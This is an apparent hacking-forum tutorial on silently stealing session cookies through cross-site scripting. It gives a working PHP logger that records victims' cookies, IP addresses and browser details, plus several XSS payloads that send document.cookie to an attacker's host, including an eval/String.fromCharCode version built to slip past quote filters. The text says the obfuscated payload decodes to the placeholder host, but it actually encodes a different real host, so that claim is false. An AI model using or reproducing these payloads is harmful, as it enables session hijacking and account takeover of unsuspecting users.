For
when you want to steal someone's session cookies but you don't want to raise
the alarm!
What/why?
Stealing cookies isn't complicated, but sometimes it can be tricky depending on
what is filtered from your JS injection. It can be made much harder if your aim
is to steal them silently without the person knowing.
The script
PHP
Code:
<?
//Check if cookie file exists, if not create it
if (!file_exists("cookie.txt")) {file_put_contents("cookie.txt", "<h1>r0ng's cookie logger</h1>");
}
//Set cookie file variable
$file = 'cookie.txt';
//Check for password, display cookie file to admin
if (isset($_GET['pass']) && $_GET['pass'] == "r0ng") {
while (!is_readable($file)) {
//Wait for file permissions
}
die("<table><tr><th>FLAG</th><th>LOCATION</th><th>IP-ADDRESS</th><th>HTTP_USER_AGENT</th><th>COOKIES</th><th>HTTP_REFERER</th></tr>" . file_get_contents($file) . "</table>");
}
//Derive victim's real ip
$ipAddress = $_SERVER['REMOTE_ADDR'];
if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) {
$ipAddress = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
}
//cURL function for geo API calls
function get_content($URL){
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $URL);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
//Setting data variable with victim's info in table form
$countryCode = get_content('http://api.wipmania.com/' . $ipAddress);$data = "<tr><td><img src=http://www.geonames.org/flags/x/" . strtolower($countryCode) . ".gif width='100'></td><td>" . $countryCode . "</td><td>" . htmlspecialchars($ipAddress) . "</td><td>" . htmlspecialchars($_SERVER['HTTP_USER_AGENT']) . "</td><td>" . (isset($_GET['cookie']) ? htmlspecialchars($_GET['cookie']) :"") . "</td><td>" . (isset($_SERVER['HTTP_REFERER']) ? htmlspecialchars($_SERVER['HTTP_REFERER']) :"") . "</td><tr>";
while (!is_writable($file)) {
//Wait for file permissions
}
//Append data to file in new line
file_put_contents($file, $data, FILE_APPEND);?>
Tutorial
a.) Setting it up:
Upload that script to your webhost (logger.php).
You access the admin panel with /logger.php?pass=r0ng
b.) JS injections:
For most of the injections, we are taking advantage of the inherent
stealthiness of XMLHttpRequests. Same-domain restrictions only apply if we need
a response from our evil-site (which we don't).
1.) Quotes allowed:
<script>var a = new XMLHttpRequest(); a.open("get", "http://yourevilsite.com/logger.php?cookie=" + document.cookie); a.send();</script>
2.) Apostrophe allowed:
<script>var a = new XMLHttpRequest(); a.open('get', 'http://yourevilsite.com/logger.php?cookie=' + document.cookie); a.send();</script>
3.) Quotes/apostraphe not allowed:
<script>eval(String.fromCharCode(118, 97, 114, 32, 97, 32, 61, 32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 41, 59, 32, 97, 46, 111, 112, 101, 110, 40, 39, 103, 101, 116, 39, 44, 32, 39, 104, 116, 116, 112, 58, 47, 47, 100, 102, 117, 49, 50, 51, 46, 99, 111, 109, 117, 108, 101, 46, 99, 111, 109, 47, 108, 111, 103, 103, 101, 114, 46, 112, 104, 112, 63, 99, 111, 111, 107, 105, 101, 61, 39, 32, 43, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 41, 59, 32, 97, 46, 115, 101, 110, 100, 40, 41, 59));</script>
Note
1: Converting the above charcode array back to string would give:
var a = new XMLHttpRequest(); a.open('get', 'http://yourevilsite.com/logger.php?cookie=' + document.cookie); a.send();
Here
is a newbie friendly site to create charcodes: http://jdstiles.com/java/cct.html
4.) Quotes/apostrophe not allowed but can reference external script:
<SCRIPT SRC=http://yourevilsite.com/evil.js></SCRIPT>
Note 2: Any of the other injections would be placed inside of the evil.js
file (without javascript tags).
5.) Not enough space:
<script>window.location.replace("//yourevilsite.com/logger.php?cookie=" + document.cookie)</script>
Note
3: All of these are silent other than number 5. If you need to use that,
you can add a meta-refresh redirect back to the referrer header, easily
googleable if you don't know how)
